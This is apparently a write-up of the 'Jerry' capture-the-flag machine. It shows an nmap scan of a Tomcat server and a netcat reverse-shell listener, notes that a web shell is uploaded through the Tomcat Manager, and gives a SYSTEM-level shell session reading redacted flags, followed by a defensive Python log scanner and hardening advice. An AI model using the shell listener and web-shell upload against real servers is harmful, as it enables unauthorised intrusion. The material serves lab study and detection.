Jerry

Introduction:

Jerry is a very easy machine: you enumerate the Tomcat web server and upload a web shell to exploit the box.

Recon

nmap -sS -sC -sV -T4 -O -oN nmap.jerry.txt 10.10.10.95
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 15:22 EST
Nmap scan report for 10.10.10.95
Host is up (0.013s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.91 seconds

Enumeration

Visit the webserver homepage

Jerry Home

Versions

Exploitation

Tomcat Applications

Reverse Shell setup

Reverse Shell Invocation

Post-exploit/PrivEsc

nc -lvnp 4444
listening on [any] 4444 ...

who
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.95] 49196


whoami
nt authority\system

pwd

Path
----
C:\apache-tomcat-7.0.88



cd ..

dir


    Directory: C:\


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----          1/1/2021   6:20 AM            apache-tomcat-7.0.88
d----         8/22/2013   6:52 PM            PerfLogs
d-r--         6/19/2018   6:42 PM            Program Files
d----         6/19/2018   6:42 PM            Program Files (x86)
d-r--         6/18/2018  11:31 PM            Users
d----          1/1/2021   6:20 AM            Windows



cd Users

dir


    Directory: C:\Users


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         6/18/2018  11:31 PM            Administrator
d-r--         8/22/2013   6:39 PM            Public



cd Administrator\Desktop

dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         6/19/2018   7:09 AM            flags



cd flags

dir


    Directory: C:\Users\Administrator\Desktop\flags


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         6/19/2018   7:11 AM         88 2 for the price of 1.txt





type 2*
user.txt
70XXXXXXXXXXXXXXXXXXXXXX00

root.txt
04XXXXXXXXXXXXXXXXXXXXXe90e
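
The upload step as it looks from the defender's side, as an added example that is not part of the original write-up: it scans a Tomcat access log for successful application deployments and for the first request to a context that had never answered before. It assumes the web shell was deployed as a WAR through Tomcat's Manager application and that the access log uses the `common` pattern; the sample log lines, account name and context name are constructed.

```python
import re
from collections import namedtuple

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Manager endpoints that install an application: HTML form upload and text API deploy
DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy)\b')
Finding = namedtuple("Finding", "kind host user ts detail")

def context_of(path):
    """Web application context of a request path ('/' for the ROOT application)."""
    parts = path.split("?", 1)[0].split("/")
    return "/" + parts[1] if len(parts) > 2 else "/"

def analyze(lines):
    """Report successful manager deployments and the first hit on each context
    that was never served before a deployment (a likely freshly installed WAR)."""
    seen, findings, deployed = set(), [], False
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # not an access-log line in the expected pattern
        path, status = m["path"], int(m["status"])
        ctx = context_of(path)
        if DEPLOY.match(path) and status == 200:
            findings.append(Finding("deploy", m["host"], m["user"], m["ts"], path.split("?")[0]))
            deployed = True
        elif deployed and status == 200 and ctx not in seen:
            findings.append(Finding("new-context", m["host"], m["user"], m["ts"], ctx))
        if status < 400:
            seen.add(ctx)  # baseline of contexts that already answered
    return findings

# Constructed sample log (documentation address, placeholder account and context name)
SAMPLE = """\
192.0.2.10 - - [31/Dec/2020:15:30:01 -0500] "GET / HTTP/1.1" 200 11398
192.0.2.10 - - [31/Dec/2020:15:30:09 -0500] "GET /manager/html HTTP/1.1" 401 2536
192.0.2.10 - svc-deploy [31/Dec/2020:15:30:20 -0500] "GET /manager/html HTTP/1.1" 200 17000
192.0.2.10 - svc-deploy [31/Dec/2020:15:31:02 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=0000 HTTP/1.1" 200 18000
192.0.2.10 - - [31/Dec/2020:15:31:15 -0500] "GET /newapp/ HTTP/1.1" 200 12
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE.splitlines()):
        print(f"{f.ts} {f.kind:<12} src={f.host} user={f.user} {f.detail}")
```

The `whoami` output above shows why such a deployment matters on this host: code running inside Tomcat runs as `nt authority\system`, so running the Tomcat service under a low-privileged account and restricting who can reach the Manager application both shrink the impact.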

Notes: